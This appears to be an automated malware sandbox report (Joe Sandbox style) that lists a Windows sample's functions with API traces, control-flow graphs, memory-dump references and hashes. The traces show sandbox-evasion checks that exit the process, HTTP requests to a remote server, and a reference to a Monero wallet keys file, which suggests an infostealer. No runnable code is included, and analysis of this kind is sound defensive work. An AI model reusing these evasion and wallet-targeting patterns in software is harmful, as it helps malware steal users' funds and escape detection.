                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01318B98,?,00A510F4,?,00000000,?,00A510F8,?,00000000,00A50AF3), ref: 00A46D6A
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A46D88
                                      • CloseHandle.KERNEL32(00000000), ref: 00A46D99
                                      • Sleep.KERNEL32(00001770), ref: 00A46DA4
                                      • CloseHandle.KERNEL32(?,00000000,?,01318B98,?,00A510F4,?,00000000,?,00A510F8,?,00000000,00A50AF3), ref: 00A46DBA
                                      • ExitProcess.KERNEL32 ref: 00A46DC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                      • String ID:
                                      • API String ID: 2525456742-0
                                      • Opcode ID: 0629eefc00f4092eca3211abd705360b2676bd0bda5f1e0500092879cd2a6b93
                                      • Instruction ID: 8562fe2480e49c6a8278581fa532db610ac31ce8b014b0f9659570d17a90b7ce
                                      • Opcode Fuzzy Hash: 0629eefc00f4092eca3211abd705360b2676bd0bda5f1e0500092879cd2a6b93
                                      • Instruction Fuzzy Hash: 48313C79E44604ABDB44FBF0DE56BFE7379AF94340F000928F112A61D2DF706905C662
                                      Function 00A31220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1436 a31220-a31247 call a48b40 GlobalMemoryStatusEx 1439 a31273-a3127a 1436->1439 1440 a31249-a31271 call a4dd30 * 2 1436->1440 1441 a31281-a31285 1439->1441 1440->1441 1443 a31287 1441->1443 1444 a3129a-a3129d 1441->1444 1446 a31292-a31294 ExitProcess 1443->1446 1447 a31289-a31290 1443->1447 1447->1444 1447->1446
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00A3123E
                                      • __aulldiv.LIBCMT ref: 00A31258
                                      • __aulldiv.LIBCMT ref: 00A31266
                                      • ExitProcess.KERNEL32 ref: 00A31294
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                      • String ID: @
                                      • API String ID: 3404098578-2766056989
                                      • Opcode ID: 142c040cfe3e76c424d12486e4f48b98c93e872b1427b01c6a3b4d7cb42ccaf7
                                      • Instruction ID: ca5956be080d7098fc6ec44b2709f1a68cc003ce8a5f2d796316e9a36d67f31a
                                      • Opcode Fuzzy Hash: 142c040cfe3e76c424d12486e4f48b98c93e872b1427b01c6a3b4d7cb42ccaf7
                                      • Instruction Fuzzy Hash: C6011DB0D44308BAEB10EFE4DD4ABEEBB78AB54705F208458F604BA2C1D67455458769
                                      Function 00A46D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1450 a46d93 1451 a46daa 1450->1451 1453 a46dac-a46dc2 call a46bc0 call a45d60 CloseHandle ExitProcess 1451->1453 1454 a46d5a-a46d77 call a4ade0 OpenEventA 1451->1454 1460 a46d95-a46da4 CloseHandle Sleep 1454->1460 1461 a46d79-a46d91 call a4ade0 CreateEventA 1454->1461 1460->1451 1461->1453
                                      APIs
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01318B98,?,00A510F4,?,00000000,?,00A510F8,?,00000000,00A50AF3), ref: 00A46D6A
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A46D88
                                      • CloseHandle.KERNEL32(00000000), ref: 00A46D99
                                      • Sleep.KERNEL32(00001770), ref: 00A46DA4
                                      • CloseHandle.KERNEL32(?,00000000,?,01318B98,?,00A510F4,?,00000000,?,00A510F8,?,00000000,00A50AF3), ref: 00A46DBA
                                      • ExitProcess.KERNEL32 ref: 00A46DC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                      • String ID:
                                      • API String ID: 941982115-0
                                      • Opcode ID: 2a146b01a399524966b43bd10b359021c86dda0ab76f82d7bff8a390183249ec
                                      • Instruction ID: 2ae17425fd4366c5ebc055d618a363c3f165d5d9847795c8a6138e97e7ed8e3c
                                      • Opcode Fuzzy Hash: 2a146b01a399524966b43bd10b359021c86dda0ab76f82d7bff8a390183249ec
                                      • Instruction Fuzzy Hash: B5F05E78E88B09ABEB40ABA0DD0ABBE3774AF95701F100519B516A92D1CBF06500CA67
                                      Function 00A34800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A34889
                                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00A34899
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CrackInternetlstrlen
                                      • String ID: <
                                      • API String ID: 1274457161-4251816714
                                      • Opcode ID: 8372dcbcafa7e8653949f13315e9fffbcaca309092e3eb65457c4aa8188d2805
                                      • Instruction ID: c786a81388fba12dace2be09f7d1c9884a89f72c256ff84e2b4a99fb50129ef5
                                      • Opcode Fuzzy Hash: 8372dcbcafa7e8653949f13315e9fffbcaca309092e3eb65457c4aa8188d2805
                                      • Instruction Fuzzy Hash: E62150B1D00208ABDF14DFA4ED4ABDE7B74FB44350F108625F515A72C0DB706A09CB91
                                      Function 00A45440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                        • Part of subcall function 00A362D0: InternetOpenA.WININET(00A50DFF,00000001,00000000,00000000,00000000), ref: 00A36331
                                        • Part of subcall function 00A362D0: StrCmpCA.SHLWAPI(?,0131F410), ref: 00A36353
                                        • Part of subcall function 00A362D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A36385
                                        • Part of subcall function 00A362D0: HttpOpenRequestA.WININET(00000000,GET,?,0131EE20,00000000,00000000,00400100,00000000), ref: 00A363D5
                                        • Part of subcall function 00A362D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A3640F
                                        • Part of subcall function 00A362D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A36421
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A45478
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                      • String ID: ERROR$ERROR
                                      • API String ID: 3287882509-2579291623
                                      • Opcode ID: 2c7e5c64d6c9a3e52a6c9148ded81a82cd9927465eb64b4b12b80d37d67ed3d0
                                      • Instruction ID: b18d32312d9cdbc85a926f6fd0048d73f867dc503005cc0b923f054ddf25721f
                                      • Opcode Fuzzy Hash: 2c7e5c64d6c9a3e52a6c9148ded81a82cd9927465eb64b4b12b80d37d67ed3d0
                                      • Instruction Fuzzy Hash: 8B115635D40508ABDB14FFB4DE52AED7379AFA0341F404568F91A5B492EF30AB05C651
                                      Function 00A47A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A47AA0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A47AA7
                                      • GetComputerNameA.KERNEL32(?,00000104), ref: 00A47ABF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateComputerNameProcess
                                      • String ID:
                                      • API String ID: 1664310425-0
                                      • Opcode ID: f47d230148ab0422b0e7e99db17bc79ee6129ab0423530c7143fac828898cef6
                                      • Instruction ID: 4e440460b20396c631ce58e8c73884ace7525c2a89dcea7085687d858dfef40a
                                      • Opcode Fuzzy Hash: f47d230148ab0422b0e7e99db17bc79ee6129ab0423530c7143fac828898cef6
                                      • Instruction Fuzzy Hash: 660186B1A08349ABC700DF98DD45FAEBBB8F744755F100129F505E6380D7745A0087A1
                                      Function 00A31110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00A3112B
                                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 00A31132
                                      • ExitProcess.KERNEL32 ref: 00A31143
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AllocCurrentExitNumaVirtual
                                      • String ID:
                                      • API String ID: 1103761159-0
                                      • Opcode ID: ec81478aac0958cbfe8b4411e6b380a552b06a8f158a7311bc697885bdebbfef
                                      • Instruction ID: 4b299d94abd9d9436268be6443fd25a5087b1b1ec19daa0b0a1c38a151aa8fdf
                                      • Opcode Fuzzy Hash: ec81478aac0958cbfe8b4411e6b380a552b06a8f158a7311bc697885bdebbfef
                                      • Instruction Fuzzy Hash: A8E0E670E49308FBE7106BA19D0AB4D76789B04B15F100155F70DBA2D0C6B53540566D
                                      Function 00A310A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00A310B3
                                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00A310F7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFree
                                      • String ID:
                                      • API String ID: 2087232378-0
                                      • Opcode ID: d9a8f44535adaa829145038a2aec4d6679cdf2cc1a5eff38a3d238950b51e12f
                                      • Instruction ID: 671b1ee983cc3362c9567c46aab636f0839a45835caa46ef238b27de9097cf8b
                                      • Opcode Fuzzy Hash: d9a8f44535adaa829145038a2aec4d6679cdf2cc1a5eff38a3d238950b51e12f
                                      • Instruction Fuzzy Hash: 5DF082B1641318BBE7189BB4AC59FAEB7A8E705B05F300448F504EB280D571AE00DAA4
                                      Function 00A31190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A47A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A47AA0
                                        • Part of subcall function 00A47A70: RtlAllocateHeap.NTDLL(00000000), ref: 00A47AA7
                                        • Part of subcall function 00A47A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00A47ABF
                                        • Part of subcall function 00A479E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00A311B7), ref: 00A47A10
                                        • Part of subcall function 00A479E0: RtlAllocateHeap.NTDLL(00000000), ref: 00A47A17
                                        • Part of subcall function 00A479E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00A47A2F
                                      • ExitProcess.KERNEL32 ref: 00A311C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$Process$AllocateName$ComputerExitUser
                                      • String ID:
                                      • API String ID: 3550813701-0
                                      • Opcode ID: afcd253a257e0d8c64392dbc8e4bac698aa2d069fa603671bf97b8208dc05ba4
                                      • Instruction ID: e1189a319bb9ef8a6201e4e86d6ac0f129c28b13a02a852f20255a8784840d0f
                                      • Opcode Fuzzy Hash: afcd253a257e0d8c64392dbc8e4bac698aa2d069fa603671bf97b8208dc05ba4
                                      • Instruction Fuzzy Hash: 5CE012B9D0430197DA1073B57D07B5F329C9B5474AF000918FA08C6242EE25F8524175

                                      Non-executed Functions

                                      Function 00A3BE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
